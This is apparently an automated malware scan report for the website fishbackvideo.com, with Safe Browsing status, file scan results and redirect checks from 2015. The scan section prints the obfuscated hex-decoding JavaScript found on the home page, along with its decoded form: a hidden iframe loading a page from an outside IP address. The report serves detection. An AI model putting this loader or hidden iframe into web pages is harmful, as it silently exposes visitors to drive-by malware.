Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fishbackvideo.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fishbackvideo.com/ | 200 OK Content-Length: 15820 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v4f1651d11cc2a(v4f1651d11d017){ return(parseInt(v4f1651d11d017,16));}function v4f1651d11dbca(v4f1651d11dfb1){ function v4f1651d11eb6b () {var v4f1651d11ef54=2; return v4f1651d11ef54;} var v4f1651d11e39e='';for(v4f1651d11e783=0; v4f1651d11e783<v4f1651d11dfb1.length; v4f1651d11e783+=v4f1651d11eb6b()){ v4f1651d11e39e+=(String.fromCharCode(v4f1651d11cc2a(v4f1651d11dfb1.substr(v4f1651d11e783, v4f1651d11eb6b()))));}return v4f1651d11e39e;} document.write(v4f1651d11dbca('3C696672616D65206E616D653D273861323227207372633D27687474703A2F2F3138382E3134332E3233322E3135362F74657374272077696474683D333330206865696768743D353537207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='8a22' src='http://188.143.232.156/test' width=330 height=557 style='display:none'></iframe> Antivirus reports:
| ||
http://fishbackvideo.com/../js/jquery-1.3.2.min.js | 400 Bad Request Content-Length: 75 Content-Type: text/html | clean |
http://fishbackvideo.com/test404page.js | 404 Not Found Content-Length: 73 Content-Type: text/html | clean |
http://fishbackvideo.com/../js/jquery.easing.1.2.js | 400 Bad Request Content-Length: 75 Content-Type: text/html | clean |
http://fishbackvideo.com/../js/jquery.anythingslider.js | 400 Bad Request Content-Length: 75 Content-Type: text/html | clean |
http://fishbackvideo.com/../js/cufon-yui.js | 400 Bad Request Content-Length: 75 Content-Type: text/html | clean |
http://fishbackvideo.com/../js/cufon-replace.js | 400 Bad Request Content-Length: 75 Content-Type: text/html | clean |
http://fishbackvideo.com/../js/WC_ROUGHTRAD_Bta_400.font.js | 400 Bad Request Content-Length: 75 Content-Type: text/html | clean |
http://l.yimg.com/d/lib/smb/js/hosting/cp/js_source/whv2_001.js | 200 OK Content-Length: 669 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fishbackvideo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Jan 2015 01:09:28 GMT
Accept-Ranges: bytes
Age: 0
Server: ATS/5.0.1
Content-Length: 15820
Content-Type: text/html
Last-Modified: Sun, 22 Jan 2012 22:20:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=9ilf2npabjdi8&b=3&s=93; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.fishbackvideo.com
X-Host: p9w16.geo.bf1.yahoo.com
X-INKT-SITE: http://www.fishbackvideo.com
X-INKT-URI: http://www.fishbackvideo.com//index.html
...15820 bytes of data.
GET / HTTP/1.1
Host: fishbackvideo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Jan 2015 01:09:28 GMT
Accept-Ranges: bytes
Age: 0
Server: ATS/5.0.1
Content-Length: 15820
Content-Type: text/html
Last-Modified: Sun, 22 Jan 2012 22:20:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=9ilf2npabjdi8&b=3&s=93; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.fishbackvideo.com
X-Host: p9w16.geo.bf1.yahoo.com
X-INKT-SITE: http://www.fishbackvideo.com
X-INKT-URI: http://www.fishbackvideo.com//index.html
...15820 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fishbackvideo.com
Referer: http://www.google.com/search?q=fishbackvideo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fishbackvideo.com
Referer: http://www.google.com/search?q=fishbackvideo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.